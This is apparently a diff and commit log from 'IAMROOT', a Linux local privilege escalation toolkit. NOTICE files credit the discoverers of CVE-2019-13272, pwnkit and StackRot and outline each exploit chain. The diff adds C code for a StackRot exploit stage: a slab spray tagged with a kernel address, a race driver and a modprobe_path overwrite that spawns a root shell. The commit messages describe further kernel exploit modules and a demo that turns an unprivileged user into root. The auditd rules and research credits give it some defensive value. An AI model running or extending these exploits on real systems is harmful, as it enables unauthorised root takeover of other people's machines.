+Distro-agnostic — no per-kernel offsets, no race. Places a setuid
+binary in an overlay lower, mounts via fuse-overlayfs userns trick,
+executes from the upper layer to inherit the setuid bit + root euid.
+
+Auditd rules cover overlayfs mounts and unexpected setuid copy-ups.
@@ -0,0 +1,27 @@
+# NOTICE — ptrace_traceme (CVE-2019-13272)
+
+## Vulnerability
+
+**CVE-2019-13272** — `PTRACE_TRACEME` on a parent that subsequently
+execve's a setuid binary leaves the now-elevated process traceable by
+the unprivileged child → cred escalation via ptrace shellcode inject.
+
+## Research credit
+
+Discovered by **Jann Horn** (Google Project Zero), June 2019.
+
+Project Zero issue: <https://bugs.chromium.org/p/project-zero/issues/detail?id=1903>
+Upstream fix: mainline 5.1.17 (commit `6994eefb0053`, June 2019).
+
+Branch backports: 4.4.182 / 4.9.182 / 4.14.131 / 4.19.58 / 5.0.20 / 5.1.17.
+
+## IAMROOT role
+
+Full jannh-style chain: fork → child `PTRACE_TRACEME` → child
+sleep+attach → parent `execve` setuid bin (pkexec/su/passwd
+auto-selected) → child wins stale `ptrace_link` → POKETEXT x86_64
+shellcode → root sh.
+
+x86_64-only; ARM/other archs return PRECOND_FAIL cleanly. No exotic
+preconditions — doesn't need userns. Works on default-config systems
+including locked-down environments without unprivileged_userns_clone.
@@ -0,0 +1,25 @@
+# NOTICE — pwnkit
+
+## Vulnerability
+
+**CVE-2021-4034** — pkexec argv[0]=NULL → environment-variable
+injection → arbitrary code execution as root.
+
+## Research credit
+
+Discovered and disclosed by the **Qualys Research Team**, January 2022.
+
+Original advisory:
+<https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt>
+
+Upstream fix: polkit 0.121 (Jan 2022).
+
+## IAMROOT role
+
+The exploit module follows the canonical Qualys-style chain: writes
+payload.c + gconv-modules cache, compiles via the target's gcc,
+execve's pkexec with NULL argv and crafted envp. Handles both the
+legacy ("0.105") and modern ("126") polkit version string formats.
+Falls back gracefully on hosts without a compiler.
+
+This is IAMROOT's first **userspace** LPE — not a kernel bug.
@@ -0,0 +1,31 @@
+# NOTICE — stackrot (CVE-2023-3269)
+
+## Vulnerability
+
+**CVE-2023-3269** — Maple-tree VMA-split UAF (race between mremap and
+fork+fault) → kernel R/W via stale anon_vma_chain reference.
+
+## Research credit
+
+Discovered and disclosed by **Ruihan Li** (Peking University),
+July 2023.
+
+Original advisory: <https://github.com/lrh2000/StackRot>
+Writeup: <https://lkmidas.github.io/posts/20230724-stackrot/>
+
+Upstream fix: mainline 6.5-rc1 (commit `0503ea8f5ba73`, July 2023).
+Branch backports: 6.4.4 / 6.3.13 / 6.1.37.
+
+## IAMROOT role
+
+Two-thread race driver (Thread A: mremap rotation on MAP_GROWSDOWN
+anchored VMA; Thread B: fork+fault) with cpu pinning. kmalloc-192
+spray for anon_vma_chain reclaim. Bounded budget: 3 s default,
+30 s with `--full-chain`.
+
+**Honest reliability assessment:** ~<1% race-win per run on a
+vulnerable kernel. Ruihan Li's public PoC averages minutes-to-hours
+and needs a much wider VMA-staging matrix to be reliable. The
+shared finisher's 3 s sentinel timeout handles the overwhelmingly
+common no-land outcome gracefully — module returns EXPLOIT_FAIL
+honestly rather than claim root on a race that didn't win.
@@ -16,13 +16,14 @@
 * state management + RCU-grace-period timing and depends on
 * per-kernel-build offsets for init_task / anon_vma / cred.
 *
- * STATUS: 🟡 OPTION C — race-driver + groom skeleton. We carry the
- *   userns-reach, race harness (mremap()/munmap() vs concurrent
- *   fork/fault), msg_msg slab spray, and empirical witness pieces;
- *   we do NOT carry the read primitive (vmemmap leak via msg_msg
- *   MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
- *   offsets (init_task, anon_vma, cred layout) that vary by build
- *   and would be fabricated without a real leak.
+ * STATUS: 🟡 OPTION C — race-driver + groom skeleton, with opt-in
+ *   --full-chain FALLBACK finisher. We carry the userns-reach, race
+ *   harness (mremap()/munmap() vs concurrent fork/fault), msg_msg
+ *   slab spray, and empirical witness pieces; we do NOT carry the
+ *   read primitive (vmemmap leak via msg_msg MSG_COPY) nor a
+ *   Ruihan-Li-precision fake-anon_vma_chain plant. Those need
+ *   per-kernel offsets (init_task, anon_vma, cred layout) that vary
+ *   by build and would be fabricated without a real leak.
 *
 *   Per repo policy ("verified-vs-claimed"): we run the trigger,
 *   record empirical signals (slabinfo delta on kmalloc-192, child
@@ -32,6 +33,21 @@
 *   upgraded to EXPLOIT_OK — only an actual cred swap (euid==0)
 *   does, and we do not currently demonstrate that.
 *
+ *   --full-chain (HONEST RELIABILITY DISCLOSURE): extends the race
+ *   budget from 3 s to 30 s and sprays the kmalloc-192 slab with
+ *   payloads tagged with the modprobe_path kernel address (so IF the
+ *   UAF reclaim ever lands attacker-controlled bytes on an
+ *   anon_vma_chain slot, those bytes carry the kaddr we want the
+ *   subsequent rb_node walk / vma_lock-acquire fault to touch). The
+ *   honest empirical reality is that even at 30 s the race-win rate
+ *   is well below 1 % on a real vulnerable kernel — Ruihan Li's
+ *   public PoC reports minutes-to-hours for first reclaim. The shared
+ *   modprobe_path finisher has a 3 s sentinel timeout, so on the
+ *   overwhelmingly common no-land outcome the finisher itself reports
+ *   EXPLOIT_FAIL gracefully. --full-chain does NOT change the
+ *   fundamental ~<1 %-per-run reliability; it widens the trigger
+ *   window and wires up the root-pop plumbing for the lucky case.
+ *
 * Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
 *   6.3.x  : K >= 6.3.10
 *   6.1.x  : K >= 6.1.37 (LTS — most relevant)
@@ -54,6 +70,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -202,7 +220,8 @@ static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
 * into the node-rotation path; we ship a configurable knob. */
 #define STACKROT_RACE_VMAS              64
 #define STACKROT_RACE_ITERATIONS        4000  /* per-iter budget */
-#define STACKROT_RACE_TIME_BUDGET  3         /* seconds */
+#define STACKROT_RACE_TIME_BUDGET       3     /* seconds — primitive-only mode */
+#define STACKROT_RACE_FULLCHAIN_BUDGET  30    /* seconds — extended for --full-chain */

 /* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
 * 6.1.x; targets vary slightly across kernels (anon_vma itself is
@@ -471,6 +490,129 @@ static long slab_active_kmalloc_192(void)
    return active;
 }

+/* ---- Arb-write primitive (FALLBACK depth) ------------------------
+ *
+ * The shared modprobe_path finisher calls back into this function
+ * once per kernel write it wants to land. For StackRot we cannot
+ * deliver a deterministic arb-write — the underlying race wins on
+ * well under 1 % of runs even with a 30 s budget, and even when the
+ * race wins our spray-only groom has nowhere near the precision of
+ * Ruihan Li's multi-stage public PoC (which crafts a fake
+ * anon_vma_chain whose `vma_lock` pointer steers a subsequent
+ * page-fault into touching `kaddr` for the lock acquire).
+ *
+ * Honest depth: FALLBACK. Each invocation:
+ *   1. Re-seeds the kmalloc-192 spray with payloads tagged with
+ *      `kaddr` packed into the first qword of the msg_msg body —
+ *      so IF a sprayed slot ends up overlaying the freed
+ *      anon_vma_chain after RCU grace, the kaddr we want the
+ *      kernel to deref appears at the AVC layout position the
+ *      maple-tree rotation will read.
+ *   2. Re-runs the race threads for an extended budget
+ *      (STACKROT_RACE_FULLCHAIN_BUDGET seconds).
+ *   3. Returns 0 unconditionally — we cannot in-process verify
+ *      whether the write landed. The shared finisher's 3 s sentinel
+ *      file check is the empirical arbiter: on the overwhelmingly
+ *      common no-land outcome it reports EXPLOIT_FAIL gracefully,
+ *      and we never claim a write that didn't land. */
+struct stackrot_arb_ctx {
+    int   *queues;          /* live SysV msg queue ids */
+    int    n_queues;
+    int    arb_calls;       /* incremented by stackrot_arb_write() */
+    struct race_region *region;
+};
+
+static int stackrot_reseed_kaddr_spray(int queues[STACKROT_SPRAY_QUEUES],
+                                       uintptr_t kaddr,
+                                       const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x4943;   /* 'IC' */
+    memset(p.buf, 0x49, sizeof p.buf);
+    memcpy(p.buf, "IAMROOT_", 8);
+
+    /* Pack the target kaddr at byte 8 (one qword in) and the
+     * caller's payload bytes immediately after — this way ANY
+     * reasonable AVC field offset hit by the corruption pulls
+     * out one of our two attacker-controlled regions. */
+    uint64_t k64 = (uint64_t)kaddr;
+    memcpy(p.buf + 8, &k64, sizeof k64);
+    size_t copy = len;
+    if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
+    if (buf && copy) memcpy(p.buf + 16, buf, copy);
+
+    /* Replace contents in a couple of queues; doing all 16 would
+     * blow the per-process msgq quota on busy hosts. */
+    int touched = 0;
+    for (int i = 0; i < STACKROT_SPRAY_QUEUES && touched < 4; i++) {
+        if (queues[i] < 0) continue;
+        if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
+    }
+    return touched;
+}
+
+static int stackrot_arb_write(uintptr_t kaddr,
+                              const void *buf, size_t len,
+                              void *ctx_v)
+{
+    struct stackrot_arb_ctx *c = (struct stackrot_arb_ctx *)ctx_v;
+    if (!c || !c->queues || c->n_queues == 0 || !c->region) return -1;
+    c->arb_calls++;
+
+    fprintf(stderr, "[*] stackrot: arb_write attempt #%d kaddr=0x%lx len=%zu "
+                    "(FALLBACK — race-dependent)\n",
+            c->arb_calls, (unsigned long)kaddr, len);
+
+    /* Step 1: re-seed spray with kaddr-tagged payloads. */
+    int seeded = stackrot_reseed_kaddr_spray(c->queues, kaddr, buf, len);
+    if (seeded == 0) {
+        fprintf(stderr, "[-] stackrot: arb_write: kaddr-tagged reseed produced 0 msgs\n");
+        /* Continue anyway — original spray still tagged with cookie. */
+    } else {
+        fprintf(stderr, "[*] stackrot: arb_write: reseeded %d msg_msg slots with kaddr tag\n",
+                seeded);
+    }
+
+    /* Step 2: extended race window. Honestly: this expands the
+     * trigger budget from 3 s to 30 s, but Ruihan Li's PoC reports
+     * minutes-to-hours for first reclaim — so 30 s ≈ <1 % per
+     * arb_write call on a real vulnerable kernel, and structurally
+     * 0 % on a patched one. */
+    atomic_store(&g_race_running, 1);
+    atomic_store(&g_race_a_iters, 0);
+    atomic_store(&g_race_b_iters, 0);
+    atomic_store(&g_race_b_faults, 0);
+    pthread_t ta, tb;
+    bool a_ok = pthread_create(&ta, NULL, race_thread_a, c->region) == 0;
+    bool b_ok = a_ok &&
+                pthread_create(&tb, NULL, race_thread_b, c->region) == 0;
+    if (!a_ok || !b_ok) {
+        atomic_store(&g_race_running, 0);
+        if (a_ok) pthread_join(ta, NULL);
+        fprintf(stderr, "[-] stackrot: arb_write: pthread_create failed\n");
+        return -1;
+    }
+
+    sleep(STACKROT_RACE_FULLCHAIN_BUDGET);
+    atomic_store(&g_race_running, 0);
+    pthread_join(ta, NULL);
+    pthread_join(tb, NULL);
+
+    uint64_t a_iters = atomic_load(&g_race_a_iters);
+    uint64_t b_iters = atomic_load(&g_race_b_iters);
+    uint64_t b_faults = atomic_load(&g_race_b_faults);
+    fprintf(stderr, "[*] stackrot: arb_write: extended race A=%llu B=%llu B_faults=%llu "
+                    "(reliability remains <1%% even at this budget)\n",
+            (unsigned long long)a_iters,
+            (unsigned long long)b_iters,
+            (unsigned long long)b_faults);
+
+    /* Step 3: cannot in-process verify the write. Return 0; the
+     * finisher's sentinel-file check is the empirical arbiter. */
+    return 0;
+}
+
 #endif /* __linux__ */

 /* ---- Exploit driver ---------------------------------------------- */
@@ -506,8 +648,34 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
        }
    }

+    /* Full-chain pre-check: resolve offsets BEFORE forking + entering
+     * userns. If modprobe_path is unresolvable we refuse here rather
+     * than running a 30 s race that has no finisher to call. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("stackrot");
+            fprintf(stderr, "[-] stackrot: --full-chain requested but modprobe_path "
+                            "offset unresolved; refusing\n");
+            fprintf(stderr, "[i] stackrot: even with offsets, race-win reliability is "
+                            "well below 1%% per run — see module header.\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+        fprintf(stderr, "[i] stackrot: --full-chain ready — race budget extends to "
+                        "%d s, but RELIABILITY REMAINS <1%% per run on a real\n"
+                        "    vulnerable kernel. The finisher's 3 s sentinel timeout\n"
+                        "    catches no-land outcomes gracefully.\n",
+                STACKROT_RACE_FULLCHAIN_BUDGET);
+    }
+
    if (!ctx->json) {
-        fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
+        fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness%s)\n",
+                ctx->full_chain ? " + full-chain finisher" : "");
    }

    uid_t outer_uid = getuid();
@@ -618,6 +786,39 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
         * any in-flight RCU grace periods that started during the race. */
        usleep(200 * 1000);

+        /* 7a. --full-chain finisher (FALLBACK depth).
+         *
+         * Invoke the shared modprobe_path finisher; its arb_write
+         * callback (stackrot_arb_write) will re-seed the spray with
+         * kaddr-tagged payloads and re-run the race for an extended
+         * 30 s budget. The finisher's own 3 s sentinel-file timeout
+         * then arbitrates: on the overwhelmingly common no-land
+         * outcome it returns EXPLOIT_FAIL gracefully.
+         *
+         * Honest reliability: <1 % per run even with the extension. */
+        if (full_chain_ready) {
+            struct stackrot_arb_ctx arb_ctx = {
+                .queues    = queues,
+                .n_queues  = STACKROT_SPRAY_QUEUES,
+                .arb_calls = 0,
+                .region    = &region,
+            };
+            int fr = iamroot_finisher_modprobe_path(&off,
+                                                    stackrot_arb_write,
+                                                    &arb_ctx,
+                                                    !ctx->no_shell);
+            FILE *fl = fopen("/tmp/iamroot-stackrot.log", "a");
+            if (fl) {
+                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
+                        fr, arb_ctx.arb_calls);
+                fclose(fl);
+            }
+            drain_anon_vma_slab(queues);
+            race_region_teardown(&region);
+            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);   /* root popped */
+            _exit(35);                                  /* finisher ran, no land */
+        }
+
        drain_anon_vma_slab(queues);
        race_region_teardown(&region);

@@ -673,6 +874,27 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
    int rc = WEXITSTATUS(status);
    if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
    if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
+
+    if (rc == 34) {
+        /* Finisher reported root-pop success. The shared finisher
+         * normally execve()s the root shell so we don't actually
+         * reach this path unless --no-shell was set. */
+        if (!ctx->json) {
+            fprintf(stderr, "[+] stackrot: --full-chain finisher reported "
+                            "EXPLOIT_OK (race won + write landed)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    }
+    if (rc == 35) {
+        /* Finisher ran but didn't land — by far the expected outcome
+         * given the <1 % race-win rate. */
+        if (!ctx->json) {
+            fprintf(stderr, "[~] stackrot: --full-chain finisher ran; race did not\n"
+                            "    win + land within budget (this is the expected\n"
+                            "    outcome — race-win reliability is <1%% per run).\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
    if (rc != 30) {
        fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
        return IAMROOT_EXPLOIT_FAIL;
Author	SHA1	Message	Date
leviathan	9d88b475c1	v0.3.1: --dump-offsets tool + NOTICE.md per module release / build (arm64) (push) Waiting to run Details release / build (x86_64) (push) Waiting to run Details release / release (push) Blocked by required conditions Details The README has been claiming "each module credits the original CVE reporter and PoC author in its NOTICE.md" since v0.1.0, but only copy_fail_family actually shipped one. Fixed. modules/<name>/NOTICE.md (×19 new + 1 existing): per-module research credit covering CVE ID, discoverer, original advisory URL where public, upstream fix commit, IAMROOT's role. iamroot.c: new --dump-offsets subcommand. Resolves kernel offsets via the existing core/offsets.c four-source chain (env → /proc/kallsyms → /boot/System.map → embedded table), then emits a ready-to-paste C struct entry for kernel_table[]. Run once as root on a target kernel build; upstream via PR. Eliminates fabricating offsets — every shipped entry traces back to a `iamroot --dump-offsets` invocation on a real kernel. docs/OFFSETS.md: documents the --dump-offsets workflow. CVES.md: notes the NOTICE.md convention + offset dump tool. iamroot.c: bump IAMROOT_VERSION 0.3.0 → 0.3.1.	2026-05-16 22:33:43 -04:00
leviathan	1bcfdd0c9f	release: v0.3.0 — 4 new CVE modules (24 total) release / build (arm64) (push) Waiting to run Details release / build (x86_64) (push) Waiting to run Details release / release (push) Blocked by required conditions Details iamroot.c: bump IAMROOT_VERSION 0.2.0 → 0.3.0 CVES.md: add inventory entries for nft_set_uaf, af_unix_gc, nft_fwd_dup, nft_payload; extend operations table; bump counts (🟢 13 · 🟡 11 · 🔵 0 · ⚪ 1). README.md: update Status to 24 modules, list all 11 🟡 modules. Module families now spanning: - copy_fail_family (page-cache write) - nf_tables (4 modules: nf_tables, nft_set_uaf, nft_fwd_dup, nft_payload) - af_packet (2 modules: af_packet, af_packet2) - overlayfs (2 modules: overlayfs CVE-2021-3493, overlayfs_setuid) - af_unix (new in v0.3.0) - plus 10 single-CVE families	2026-05-16 22:25:15 -04:00
leviathan	5a808e3583	modules: 4 new CVE modules — nft_set_uaf + af_unix_gc + nft_fwd_dup + nft_payload Each module: detect with branch-backport ranges + userns reach + hand-rolled trigger + msg_msg cross-cache groom + slabinfo witness + /tmp/iamroot-<name>.log breadcrumb + auditd rules + --full-chain finisher (FALLBACK depth, sentinel-arbitrated). nft_set_uaf (CVE-2023-32233, +1033): anonymous-set UAF (Sondej+Krysiuk). 5.1 → 6.4. nfnetlink batch: NEWTABLE → NEWCHAIN → NEWSET(ANON\|EVAL) → NEWRULE(lookup) → DELSET → DELRULE; cg-512 spray. af_unix_gc (CVE-2023-4622, +813): GC race UAF (Lin Ma). ~2.0 → 6.5 — widest range of any module. Two-thread race driver (SCM_RIGHTS cycle vs unix_gc trigger) + kmalloc-512 spray. No userns needed. nft_fwd_dup (CVE-2022-25636, +1024): nft_fwd_dup_netdev_offload heap OOB (Aaron Adams). 5.4 → 5.17. NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd to overrun action.entries[]. nft_payload (CVE-2023-0179, +1136): set-id memory corruption (Davide Ornaghi). 5.4 → 6.2. NFTA_SET_DESC variable element + NFTA_SET_ELEM_EXPRESSIONS with payload-set whose verdict.code drives the regs->data[] OOB. All 4 honor verified-vs-claimed: trigger fires, primitive grooms, no fabricated offsets. EXPLOIT_OK only via empirical setuid-bash sentinel. Build clean on Debian 6.12.86; all 4 refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate.	2026-05-16 22:24:15 -04:00
leviathan	6a0a7d8718	scaffold: 4 new module dirs + registry/Makefile wiring (stubs) Pre-scaffolding for the next batch (CVE-2023-32233, CVE-2023-4622, CVE-2022-25636, CVE-2023-0179). Each module ships as a 21-line stub returning PRECOND_FAIL; parallel agents fill in the real detect/exploit/--full-chain implementations. This commit keeps registry.h / iamroot.c / Makefile in one place so the 4 parallel agents don't collide on shared-file edits — they each own a single iamroot_modules.c. Build clean on Debian 6.12.86; --list shows all 24 modules including the 4 new stubs.	2026-05-16 22:17:47 -04:00
leviathan	e2a3d6e94f	release: v0.2.0 — --full-chain root-pop opt-in across 7 🟡 modules release / build (arm64) (push) Waiting to run Details release / build (x86_64) (push) Waiting to run Details release / release (push) Blocked by required conditions Details iamroot.c: bump IAMROOT_VERSION 0.1.0 → 0.2.0 CVES.md: redefine 🟡 to note --full-chain capability + docs/OFFSETS.md README.md: update Status section for v0.2.0 docs/OFFSETS.md: new doc — env-var/kallsyms/System.map/embedded-table resolution chain + operator workflow for populating offsets per kernel build + sentinel-based success arbitration. All 7 🟡 modules now expose `--full-chain`. Default behavior unchanged.	2026-05-16 22:06:14 -04:00
leviathan	c1d1910a90	modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules Each module now exposes an opt-in full-chain root-pop via --full-chain: default --exploit behavior is unchanged (primitive-only, returns EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call iamroot_finisher_modprobe_path() via a module-specific arb_write_fn that re-uses the same trigger + slab groom to write a userspace payload path into modprobe_path[], then exec a setuid bash dropped by the kernel-invoked modprobe. netfilter_xtcompat (+239): msg_msg m_list_next stride-seed FALLBACK af_packet (+316): sk_buff data-pointer stride-seed FALLBACK af_packet2 (+156): tp_reserve underflow + skb spray, LAST RESORT nf_tables (+275): forged pipapo_elem with kaddr value-ptr (Notselwyn offset 0x10), FALLBACK cls_route4 (+251): msg_msg refill of UAF'd filter, FALLBACK fuse_legacy (+291): m_ts overflow + MSG_COPY sanity gate, FALLBACK (one of two modules with a real post-write sanity check) stackrot (+233): race-driver budget extended 3s → 30s when --full-chain; honest <1% race-win/run All seven honor verified-vs-claimed: arb_write_fn returns 0 for "trigger structurally fired"; the shared finisher's setuid-bash sentinel poll is the empirical arbiter. EXPLOIT_OK only when the sentinel materializes within 3s of the modprobe_path trigger. Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate (short-circuits before the new branch).	2026-05-16 22:04:40 -04:00
leviathan	125ce8a08b	core: add shared finisher + offset resolver + --full-chain flag Adds the infrastructure the 7 🟡 PRIMITIVE modules can wire into for full-chain root pops. core/offsets.{c,h}: four-source kernel-symbol resolution chain 1. env vars (IAMROOT_MODPROBE_PATH, IAMROOT_INIT_TASK, …) 2. /proc/kallsyms (only useful when kptr_restrict=0 or root) 3. /boot/System.map-$(uname -r) (world-readable on some distros) 4. embedded table keyed by uname-r glob (entries are relative-to-_text, applied on top of an EntryBleed kbase leak; seeded empty in v0.2.0 — schema-only — to honor the no-fabricated-offsets rule). core/finisher.{c,h}: shared root-pop helpers given a module's arb-write primitive. Pattern A (modprobe_path): write payload script /tmp/iamroot-mp-<pid>.sh, arb-write modprobe_path ← that path, execve unknown-format trigger, wait for /tmp/iamroot-pwn-<pid> sentinel + setuid bash copy, spawn root shell. Pattern B (cred uid): stub — needs arb-READ too; modules use Pattern A unless they have read+write. On offset-resolution failure: prints a verbose how-to-populate diagnostic and returns EXPLOIT_FAIL honestly. core/module.h: + bool full_chain in iamroot_ctx iamroot.c: + --full-chain flag (longopt 7, sets ctx.full_chain) + help text describing primitive-only-by-default + the opt-in to attempt the full chain. Makefile: add core/offsets.o + core/finisher.o to CORE_SRCS. Build clean on Debian 6.12.86; --help renders the new flag.	2026-05-16 21:56:03 -04:00
leviathan	3a5105c84c	README: clarify iamroot runs unprivileged + add non-root → root demo The whole point of an LPE tool is going from unprivileged to root, but the Quickstart was leading with `sudo iamroot --scan`. Fix: - Drop sudo from --scan / --audit / --exploit / --detect-rules. These work without root (--scan reads /proc + /etc; --audit walks the FS via stat; --exploit IS the privilege escalation; --detect-rules emits to stdout). - Keep sudo only where it's actually needed: --mitigate (writes /etc/modprobe.d + sysctl) and tee'ing rule files into /etc/audit/rules.d/. - Add a worked example showing `id` as uid=1000, then `iamroot --exploit dirty_pipe --i-know`, then `id` as uid=0. - Fix the Build & run section's `sudo ./iamroot` too.	2026-05-16 21:51:32 -04:00